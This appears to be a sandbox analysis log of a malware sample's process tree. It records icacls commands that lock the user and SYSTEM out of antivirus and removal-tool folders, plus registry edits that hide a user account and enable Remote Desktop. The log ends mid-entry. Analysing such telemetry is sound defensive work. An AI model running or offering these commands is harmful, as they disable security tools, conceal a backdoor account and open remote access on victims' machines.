  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:4424
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:2028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4316
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:4696
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:2276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4932
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:1108
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:4772
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
      4⤵
      PID:1836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:2376
    - - C:\Windows\system32\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:2468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
      4⤵
      PID:3588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:4836
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:2360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:3096
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4424
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:2908
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        5⤵
        
        PID:2872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
      4⤵
      PID:4284
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\FRST /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4696
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2800
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4932
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4780
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3200
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2376
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1656
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4452
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3388
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1120
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4424
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4660
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2508
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:824
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:4284
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3660
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5056
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2296
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:460
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:4932
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4376
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3200
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4836
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2548
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2236
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2904
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1696
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4336
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:1892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        Hide Artifacts: Hidden Users
        
        PID:2028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      4⤵
      PID:4056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:1600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:2160
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        Hide Artifacts: Hidden Users
        
        PID:4424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4004
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:832
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4556
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4784
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:5100
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1172
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
      4⤵
      PID:4092
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4928
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2800
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
      4⤵
      PID:1344
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2740
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
      4⤵
      PID:3456
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1108
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3700
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
      4⤵
      PID:4688
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4452
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2272
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2932
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4772
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2028
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3444
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2160
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1296
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4660
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:832
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3184
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3428
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4776
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3160
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3660
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2288
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4932
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1652
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:460
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2716
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
      4⤵
      PID:2848
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2460
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4632
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
      4⤵
      PID:1968
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3036
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2456
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
      4⤵
      PID:2908
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1400
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1760
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4316
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
      4⤵
      PID:4944
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2432
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1832
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
      4⤵
      PID:1976
    - - C:\Windows\system32\icacls.exe
        
